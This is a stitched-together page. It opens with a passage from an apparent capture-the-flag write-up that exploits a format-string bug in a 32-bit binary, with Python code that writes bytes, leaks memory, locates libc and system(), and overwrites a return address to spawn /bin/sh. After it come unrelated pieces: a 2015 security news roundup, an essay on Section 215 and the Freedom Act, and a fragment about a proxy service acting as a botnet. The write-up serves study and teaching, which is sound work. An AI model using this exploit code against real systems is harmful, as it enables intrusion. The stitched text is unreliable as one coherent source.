.rodata:00003170                                         ; do_jump_EXPLOITME+11Ar
.rodata:00003178 dbl_3178        dq -0.192878            ; DATA XREF: do_jump_EXPLOITME+12Cr
.rodata:00003178                                         ; do_jump_EXPLOITME+13Er

So that's kind of a freebie. If we enter them, it works:

Your options are:
1. Turn on the console
2. Leave the TARDIS
3. Dematerialize
Selection: 3
Coordinates: 51.492137,-0.192878
51.492137, -0.192878
Coordinate 51.492137,-0.192878 is occupied by another TARDIS.  Materializing there would rip a hole in time and space. Choose again.

And, to finish it off, let's verify that there is indeed a format-string vulnerability there:

Coordinates: 51.492137,-0.192878 %x %x %x
51.492137, -0.192878
Coordinate 51.492137,-0.192878 58601366 4049befe ef0f16f4 is occupied by another TARDIS.  Materializing there would rip a hole in time and space. Choose again.

Coordinates: 51.492137,-0.192878 %n
51.492137, -0.192878
Segmentation fault

Yup! :)

Part 4b: Format string exploit

I'm not going to spend any time explaining what a format string vulnerability is. If you aren't familiar, check out my last blog.

Instead, we're going to look at how I exploited this one. :)

The cool thing about this is, as you can see in the last example, if you enter "collision" coordinates (ie, the ones that trigger the format string vulnerability), the function doesn't actually return, it just prompts again. The function doesn't return until you enter valid-looking coordinates (like 1,1).

That's really handy, because it means we can exploit it over and over before letting it return. Instead of the crazy math we had to do in the earlier level, we can just write one byte at a time. And speaking of the last level, I actually solved this level before babyecho, so I didn't have the handy format-string generator that I wrote.

write_byte()

I wrote a function in python that will write a single byte to a chosen address:

def write_byte(addr, value):
    s = "51.492137,-0.192878 " + struct.pack("<I", addr)
    s += "%" + str(value + 256 - 24) + "x%20$n\n"

    print s
    sys.stdout.flush()
    sys.stdin.readline()

Basically, it uses the classic "AAAA%NNx%MM$n" string, which we saw a whole bunch in babyecho, where:

  • AAAA = the address as a 4-byte string (which will be the address written to by the %n)
  • NN = the number of bytes to waste to ensure that %n writes the proper value to AAAA (keeping in mind that the coordinates and address take up 24 bytes already)
  • MM = the number of elements on the stack before the format string reads itself (we can figure that out by bruteforce then hardcode it)

If that doesn't make sense, read the last blog - this is exactly the same attack (except simpler, because we only have to write a single byte).

leak()

Meanwhile, my teammate wrote this function that, while ugly, can leak arbitrary memory addresses using "%s":

def leak(address):
    print >> sys.stderr, "*** Leak 0x%04x" % address
    s = "51.492137,-0.192878 " + struct.pack("<I", address) + " >>>%20$s<<<"
    s = "    51.492137,-0.192878 >>>%24$s<<< " + struct.pack("<IIII", address, address, address, address)
    #print >> sys.stderr, "s", repr(s)
    print s
    sys.stdout.flush()
    sys.stdin.readline() # Echoed coordinates.
    resp = sys.stdin.readline()
    #print >> sys.stderr, "resp", repr(resp)
    m = re.search(r'>>>(.*)<<<', resp, flags=re.DOTALL)
    while m is None:
        extra = sys.stdin.readline()
        assert extra, repr(extra)
        resp += extra
        print >> sys.stderr, "read again", repr(resp)
        m = re.search(r'>>>(.*)<<<', resp, flags=re.DOTALL)
    assert m is not None, repr(resp)
    resp = m.group(1)
    if resp == "":
        resp = "\0"
    return resp

Then, exactly like the last blog, we use the vulnerability to leak a return address and frame pointer, then overwrite the return address with a chosen address, and thus obtain EIP control.

Getting libc's base address

Next, we needed an address to return to. This was a little tricky, since I wasn't able to steal a copy of their libc.so file (it's the only 32-bit level our team worked on) - that means I could easily exploit myself, because I have libc handy, but I couldn't exploit them. There's a "pwntool" module that can find base addresses given a memory leak, but it was too slow and the binary would time out before it finished (more on that later).

So, I used the format-string vulnerability and a bit of experience to get the base address of libc. We use %s in the format string to leak data from the PLT and get an address of anything in the libc binary - I chose to find printf() because it's the first one I could think of. That's at a static offset in the wwtw binary file (we already know the return address, since we leaked it off the stack, and that can be used to calculate where the PLT is).

Once I had that address, I worked my way backwards, reading the first bytes of each page (multiple of 0x1000) until I found an ELF header. Here's the code:

bf = printf_addr - 0xc280
while True:
    print >> sys.stderr, "Checking", hex(bf), " (printf - ", hex(printf_addr - bf), ")..."
    str = leak(bf)
    print >> sys.stderr, hexify(str)
    if(str[0:4] == "\x7FELF"):
        break

    bf -= 0x1000

I now had the relative offset of printf(), which means given the address of printf(), I can find the base address deterministically.

Getting system()'s address

Once I had the base address, I wanted to find the address of system(). I don't normally like using stuff I didn't write, because it's really hard to troubleshoot when there's a problem, but I couldn't find an easy way to do this by bruteforce, so I tried using pwntools ('leak' refers to the function shown earlier):

d = dynelf.DynELF(leak, libc_base_REAL)
system_addr = d.lookup("system", 'libc')

Once again, this was too slow and kept timing out. I looked at some options, like stealing the libc binary from memory by returning into the write() libc function (like I did in ropasaurusrex) or trying to make pwntools start where it left off after being disconnected, but none of it would work.

(in retrospect, I probably could have silently re-connected/re-solved the first half of the level in the leak() function and just continued where I left off, but that didn't occur to me till now, like two weeks later)

After fighting for far too long, I had a realization: maybe my home Internet connection just sucks. I uploaded the script to my server and it found the address on the first try (and solved the game portion like 10x faster).

Getting "/bin/sh"'s address

Although I ended up with the address of system(), getting the address of "/bin/sh" from libc might be a bit tricky, so instead I simply put the string in my own input buffer - the same buffer that contains the format string - and calculated the offset from the leaked ebp value to that address. Since it was on the stack, it was always at a fixed offset from the saved ebp, which we had access to.

I could easily have leaked libc until I found the offset to the string, but that's completely unnecessary.

Building the ROP chain

In the end, I had the address of system() and the address of "/bin/sh" in my buffer. I used them to construct a really simple ROP chain, similar to the one used in r0pbaby (the difference is that, since we're on 32-bit for this level, we can pass the address of "/bin/sh" on the stack and don't have to worry about finding a gadget):

write_byte(return_ptr+0, (system_addr >> 0) & 0x0FF)
write_byte(return_ptr+1, (system_addr >> 8) & 0x0FF)
write_byte(return_ptr+2, (system_addr >> 16) & 0x0FF)
write_byte(return_ptr+3, (system_addr >> 24) & 0x0FF)

write_byte(return_ptr+4, 0x5e)
write_byte(return_ptr+5, 0x5e)
write_byte(return_ptr+6, 0x5e)
write_byte(return_ptr+7, 0x5e)

sh_addr = buffer_addr + 200 + FUDGE
write_byte(return_ptr+8,  (sh_addr >> 0) & 0x0FF)
write_byte(return_ptr+9,  (sh_addr >> 8) & 0x0FF)
write_byte(return_ptr+10, (sh_addr >> 16) & 0x0FF)
write_byte(return_ptr+11, (sh_addr >> 24) & 0x0FF)

Basically, I wrote the 4-byte address of system() over the actual return address in four separate printf() calls. Then I wrote 4 useless bytes (they don't really matter - they're system()'s return address so I made them something distinct so I can recognize the crash after system() returns). Then I wrote the address of "/bin/sh" over the next 4 bytes (the first parameter to system()).

Once that was done, I sent "good" coordinates - 100000,100000 - which caused the function to return. Since the return address had been overwritten, it returned to system("/bin/sh") and it was game over.

Conclusion

I really liked this level because it was multiple parts.

First, we had to solve a game by making some simple AI.

Second, we had to find the "key" by either reverse engineering or debugging.

Third, we had to fix the timestamp using an off-by-one error.

And finally, we had to use a format string vulnerability to get EIP control and win the level.

One interesting dynamic of this level was that there were anti-debugging features in this level. One was the timeout that had to be used for the off-by-one error, since people frequently remove calls to alarm(), and the other was using the first few bytes of a function for something meaningful to mess with software breakpoints.

Community news and analysis: May 2015

Featured news

  • How effective are the security questions—and answers—used to protect sensitive accounts and information? Not very, according to new Google research. Read about how easy it is for hackers and bots to guess answers to common questions, and what users can do about it.
  • Google also published research last month on the ad injection economy (key findings here, full report here).
  • Mozilla sent a communication to CAs with root certificates included in Mozilla’s program; Mozilla, acting in the best interest of users, asked CAs to respond to five action items. They’ve stated they intend to publish the responses this month.
  • WordPress users: The Automattic team released WordPress 4.2.2, featuring critical security fixes, the first week of May. Please make sure you’re updated!
  • DomainTools put together their first report profiling malicious domains by delving into domain registration attributes and overlaying this with data on malicious activity. Their summary links to the full report here.

Malware news + analysis

  • ESET: Whitepaper on CPL malware in Brazil
  • Sophos: “PolloCrypt” ransomware sounds as ridiculous as its mascots look—but it’s a real thing targeting Aussie users. Also from Sophos: Can Rombertik malware really destroy your computer? Nope.
  • Fortinet analyses of Rombertik malware and Tinba botnet malware
  • Sucuri: Hacked websites redirect to...Bitcoin?

Other security news

  • SiteLock: Who else is reading your email? A guide to PGP encryption
  • Fortinet: Should new WHO disease-naming guidelines also be applied to malware?

Sunset for section 215, but is the world better now?

Section 215 of the US Patriot Act has been in the headlines a lot lately. This controversial section was used by the US intelligence agencies to scoop up large quantities of US phone records, among other things. The section had a sunset clause and needed to be renewed periodically, with the latest deadline at midnight May 31st 2015. The renewal has previously been a rubber-stamp thing, but not this time. Section 215 has expired and been replaced by the Freedom Act, which is supposed to be more restrictive and better protect our privacy. And that made it headline news globally.

But what does this mean in practice? Is this the end of the global surveillance Edward Snowden made us aware of? How significant is this change in reality? These are questions that aren’t necessary answered by the news coverage.

Let’s keep this simple and avoid going into details. Section 215 was just a part in a huge legal and technical surveillance system. The old section 215 allowed very broad secret warrants to be issued by FISA courts using secret interpretations of the law, forcing companies to hand over massive amounts of data about citizens’ communications. All this under gag orders preventing anyone to talk about it or even seek legal advice. The best known example was probably the bulk collection of US phone records. It’s not about tapping phones, rather about keeping track of who called whom at what time. People in US could quite safely assume that if they placed calls, NSA had them on record.

The replacing Freedom Act still allows a lot of surveillance, but aims to restrict the much criticized mass surveillance. Surveillance under Freedom Act needs to be more specified than under Section 215. Authorities can’t just tell a tele operator to hand over all phone records to see if they can find something suspicious. Now they have to specify an individual or a device they are interested in. Tele operators must store certain data about all customers, but only hand over the requested data. That’s not a problem, it is pretty much data that the operators have to keep anyway for billing purposes.

This sounds good on paper, but reality may not be so sunny. First, Freedom Act is a new thing and we don’t know yet how it will work in practice. Its interpretation may be more or less privacy friendly, time will tell. The surveillance legislation is a huge and complex wholeness. A specific kind of surveillance may very well be able to continue sanctioned by some other paragraph even if section 215 is gone. It’s also misleading when media reports that the section 215 intelligence stopped on June 1st. In reality it continues for at least six months, maybe longer, to safeguard ongoing investigations.

So the conclusion is that the practical impact of this mini reform is a lot less significant than what we could believe based on the headlines. It’s not the end of surveillance. It doesn’t guarantee privacy for people using US-based services. It is however an important and welcome signal that the political climate in US is changing. It’s a sign of a more balanced view on security versus basic human rights. Let’s hope that this climate change continues.

 

Safe surfing,
Micke

Image by Christian Holmér

It’s no Fun Being Right All the Time

Last week, I finally got around to writing about HideMyAss, and doing a spot of speculation about how other proxy anonymizers earn their coin. Almost immediately I hit "publish" I spotted this article pop up on Zdnet. Apparently/allegedly, Hola subsidise their income by turning your machine into a part-time member of a botnet.
Normally, I really enjoy being proved right - ask my long suffering colleagues. In this case though, I'd rather the news wasn't quite so worrying. A bit of advertising, click hijacking and so forth is liveable. Malware? You can get rid... but a botnet client means you might be part of something illegal, and you'd never know the difference.